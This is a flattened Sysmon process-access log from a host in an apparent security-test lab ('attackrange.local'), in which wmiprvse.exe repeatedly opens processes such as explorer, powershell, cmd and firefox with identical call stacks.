22:55:39.849{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696989Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.849{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6A70-603D-7E87-00000000AD01}3728C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696988Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.849{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696987Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.849{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696986Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.833{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696985Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.833{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696984Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.833{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696983Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.833{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696982Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.833{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696981Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.833{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696980Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.833{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696979Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.833{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696978Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.833{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696977Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.833{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696976Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.833{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696975Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.833{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7957-6039-1D10-00000000AD01}2836C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696974Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.833{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696973Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.833{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696972Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.833{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696971Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.833{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696970Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 